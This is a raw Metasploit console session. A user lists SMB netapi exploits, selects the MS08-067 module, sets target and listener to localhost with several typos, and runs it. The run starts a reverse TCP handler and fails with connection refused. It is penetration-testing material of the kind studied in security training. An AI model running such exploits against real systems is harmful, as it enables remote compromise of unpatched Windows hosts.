
msf > search netapi
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > Interrupt: use the 'exit' command to quit
msf > use exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ms08_067_netapi) > set rpot 445
rpot => 445
msf exploit(ms08_067_netapi) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf exploit(ms08_067_netapi) > set lpot 445
lpot => 445
msf exploit(ms08_067_netapi) > set lpot 80
lpot => 80
msf exploit(ms08_067_netapi) > set payload exploit/windows/vpn/safenet_like_ll
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > exploits
[-] Unknown command: exploits.
msf exploit(ms08_067_netapi) > set payload exploit/windows/vpn/safenet_like_ll
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > Interrupt: use the 'exit' command to quit
msf exploit(ms08_067_netapi) > Interrupt: use the 'exit' command to quit
msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi  2008-10-28  
